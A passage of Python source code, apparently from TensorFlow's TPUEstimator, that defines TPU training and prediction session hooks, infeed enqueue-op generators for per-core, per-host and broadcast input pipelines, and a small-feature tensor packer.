super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of [`value`, `unit`] that
represents either the number of iterations to run the optimizer per loop
(when `unit` is `count`) or the amount of time in seconds to run it per
loop (when `unit` is `seconds`).
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError(
'Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit`.')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = tf.compat.v1.train.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations are computed by choosing the smaller of (`final_step` -
`global_step`) and the initial estimated iterations returned by the
estimator (1 by default).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
tf.compat.v1.logging.info("ElapsedTime: %.3f", elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
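# A minimal, framework-free sketch of the iteration-count selection performed
# by `_TPUStopAtStepHook._next_iterations` above: each training loop runs the
# smaller of the remaining steps and the estimated per-loop iteration count
# (a fixed `count`, or a runtime-based estimate when `unit` is `seconds`).
# The helper name is illustrative and unused by this module.
def _sketch_next_iterations(global_step, final_step, estimated_iterations):
  remaining_steps = final_step - global_step
  return min(remaining_steps, estimated_iterations)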
class _SetEvalIterationsHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for the prediction model, but it makes
# TPUInfeedOutfeedSessionHook print a nicer message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return tf.compat.v1.train.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise tf.errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
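# A minimal, framework-free sketch of the stopping-signal protocol described
# in `_StoppingPredictHook.after_run` above: TPUEstimator appends one extra
# batch carrying stop=1, and the consumer drops it as soon as the signal is
# seen. The helper name and the (prediction, stop_signal) pairing are
# illustrative only.
def _sketch_drain_predictions(batches):
  """Yields predictions from (prediction, stop_signal) pairs, dropping the
  appended stop batch."""
  for prediction, stop_signal in batches:
    if stop_signal:
      return  # The appended batch; discard it and stop.
    yield prediction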
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
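# A minimal sketch (hypothetical shapes and names) of a user `input_fn` that
# is compatible with the per-core deployment above: it must return a
# `(features, labels)` tuple of tensors rather than a `tf.data.Dataset`.
def _sketch_per_core_input_fn(params):
  batch_size = params['batch_size']  # Injected by TPUEstimator.
  features = tf.zeros([batch_size, 8], dtype=tf.float32)
  labels = tf.zeros([batch_size], dtype=tf.int32)
  return features, labels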
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with tf.compat.v1.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing it as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with tf.compat.v1.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
features, labels, enqueue_datas_list = (
_tpu_estimator_embedding.split_inputs(
ctx, features, labels,
num_cores_per_batch=num_of_replicas_per_host))
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with tf.compat.v1.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=max(1, ctx.num_of_replicas_per_host))
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def device_function_impl(shard_id):
if ctx.device_assignment is not None:
# Find the replica_id of the host's logical core 0.
# The current host_id is guaranteed to contain the logical core 0,
# even when num_cores_per_replica > num_cores_per_host -- the function
# caller makes sure that this host_id will be receiving data (calls
# input_fn).
replica_id = ctx.device_assignment.lookup_replicas(
task_id=host_id, logical_core=0)[shard_id]
return ctx.tpu_host_placement_function(replica_id=replica_id)
else:
return None
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
num_replicas_per_host = max(1, ctx.num_of_replicas_per_host)
cached_signals = None
with tf.compat.v1.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for host in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with tf.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
# This avoids inconsistent state among different model replicas.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
if len(enqueue_data) != 1:
raise RuntimeError(
'Missing or extra enqueue_data for host {}. len(enqueue_data) = {}.'
.format(host, len(enqueue_data)))
enqueue_datas_list.append(enqueue_data[0])
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
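# A minimal sketch (hypothetical data and names) of a user `input_fn` for the
# per-host v2 deployment above, which requires a `tf.data.Dataset` return
# value. `drop_remainder=True` keeps the batch dimension static, which the
# model-side shape validation later in this module expects.
def _sketch_per_host_v2_input_fn(params):
  batch_size = params['batch_size']  # Per-host batch size injected by TPUEstimator.
  dataset = tf.data.Dataset.from_tensor_slices(
      (tf.zeros([1024, 8], tf.float32), tf.zeros([1024], tf.int32)))
  return dataset.repeat().batch(batch_size, drop_remainder=True)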
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with tf.compat.v1.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(shard_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=shard_id)
else:
return shard_id % num_replicas_per_host
def device_function_impl(shard_id):
# shard_id ranges from 0 to num_of_replicas_per_host - 1.
# A shard is a replica inside a host.
# In broadcast mode (generate_broadcast_enqueue_ops_fn), the enqueue ops
# are always executed on the first host. Thus shard_id equals to replica_id.
return ctx.tpu_host_placement_function(replica_id=shard_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with tf.compat.v1.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
tf.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# Slice out this core's portion of the flattened inputs.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
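# A minimal sketch of the SLICED eval configuration handled above: the single
# host batch is split into `num_replicas` slices and replica i receives slice
# i, whereas plain broadcast hands every replica the full flattened inputs.
# The helper name is illustrative and unused by this module.
def _sketch_slice_inputs_per_replica(flattened_inputs, num_replicas):
  input_slices = [tf.split(x, num_replicas) for x in flattened_inputs]
  return [[slices[i] for slices in input_slices] for i in range(num_replicas)]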
class TensorPacker(object):
"""Pack and unpack small tensors into a big one for efficiency."""
def __init__(self, small_feature_dim_size,
minimum_num_small_features_to_group):
self._small_feature_dim_size = small_feature_dim_size
self._minimum_num_small_features_to_group = (
minimum_num_small_features_to_group)
def maybe_concatenate_features(self, features):
"""If there are enough small tensors, concat them for performance."""
self._small_feature_names = {}
self._small_feature_sizes = {}
feature_names = _extract_key_names(features)
if feature_names: # Not a single tensor.
# First pass: see if it is worth concatenating the small features.
for name in feature_names:
tensor = features[name]
# We do not handle nested inputs here.
if not isinstance(tensor, tf.Tensor):
return
shape = tensor.get_shape().as_list()
dtype = tensor.dtype
if (len(shape) == 2 and shape[1] is not None and
shape[1] <= self._small_feature_dim_size):
tf.compat.v1.logging.info('Found small feature: %s %s', name, shape)
if tensor.dtype not in self._small_feature_names:
self._small_feature_names[dtype] = []
self._small_feature_sizes[dtype] = []
self._small_feature_names[dtype].append(name)
self._small_feature_sizes[dtype].append(shape[1])
dtypes_ = list(self._small_feature_names.keys())
for dtype in dtypes_:
# If we could find 5 (or more) [batch_size, 1] dense features,
# we will group them.
if (len(self._small_feature_names[dtype]) <
self._minimum_num_small_features_to_group):
self._small_feature_names.pop(dtype) # reset
self._small_feature_sizes.pop(dtype) # reset
# Second pass: separate small features out
small_feature_tensors = {}
for dtype in self._small_feature_names:
small_feature_tensors[dtype] = []
for name in self._small_feature_names[dtype]:
small_feature_tensors[dtype].append(features.pop(name))
# Add the concat Tensor to features with a special key.
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
if key in features:
raise ValueError('{} is reserved as a feature key for concatenated '
'small features.'.format(key))
features[key] = (tf.concat(small_feature_tensors[dtype], axis=1))
def maybe_split_features(self, maybe_concatenated_features):
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
concatenated_small_features = maybe_concatenated_features.pop(key)
splits = tf.split(
concatenated_small_features, self._small_feature_sizes[dtype], axis=1)
for name, split in zip(self._small_feature_names[dtype], splits):
maybe_concatenated_features[name] = split
def _get_small_feature_key(self, dtype):
return _TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY + '_' + str(dtype)
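# A minimal sketch of how `TensorPacker` is used around the infeed boundary
# (as `InputsStructureRecorder.flatten_features_and_labels` and
# `unflatten_features_and_labels` do below). The packing thresholds shown are
# illustrative, not the module's _TENSOR_PACKER_* constants.
def _sketch_tensor_packer_round_trip(features):
  packer = TensorPacker(small_feature_dim_size=8,
                        minimum_num_small_features_to_group=5)
  packer.maybe_concatenate_features(features)  # Mutates `features` in place.
  # ... here the features dict would be flattened, enqueued, dequeued ...
  packer.maybe_split_features(features)  # Restores the original small keys.
  return features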
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
the call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to the underlying methods. For TPU training,
TPUEstimator may expect multiple `features` and `labels` tuples, one for
each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested structure
supported by TF nest (namely dicts, tuples, namedtuples, or any nested
structure of such Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library,
as it expects flattened lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, features, labels, feature_dims, label_dims):
"""Flatten input dims with the same order as flattened input tensors."""
try:
flattened_input_dims = data_nest.flatten_up_to(features, feature_dims)
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched the structure of'
' features. input_partition_dims[0]: {}, features {}. {}'.format(
feature_dims, features, e))
if labels is not None:
if label_dims is not None:
try:
flattened_input_dims.extend(
data_nest.flatten_up_to(labels, self._label_dims))
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched the structure of'
' labels. input_partition_dims[1]: {}, labels: {}. {}'.format(
label_dims, labels, e))
else:
num_label_tensors = len(data_nest.flatten(labels))
flattened_input_dims.extend([None] * num_label_tensors)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
features, labels, self._feature_dims, self._label_dims)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self.tensor_packer = TensorPacker(
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE,
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP)
self.tensor_packer.maybe_concatenate_features(features)
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
features = unflattened_inputs['features']
self.tensor_packer.maybe_split_features(features)
return _Inputs(
features,
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# When tf.while_loop is called, the body function (which invokes the
# `enqueue_fn` passed in) is called to construct the graph, so the input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with tf.compat.v1.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
# This branch handles two scenarios:
# num_cores_per_replica > num_cores_per_host
# and num_cores_per_replica <= num_cores_per_host
# First, get the set of host_ids, by iterating replicas.
# We only want the set of *unique* host_ids *that will call input_fn*.
# For each replica, we only call the input_fn from the CPU host that
# contains logical core 0.
host_device_ids = set()
for replica_id in xrange(self._ctx.num_replicas):
host_device, _ = self._ctx.device_for_replica(replica_id)
# TODO(lehou): Get host_id in a better way.
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
host_device_ids.add(host_id)
for host_id in host_device_ids:
host_device = tpu_host_placement_fn(host_id=host_id)
with tf.compat.v1.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
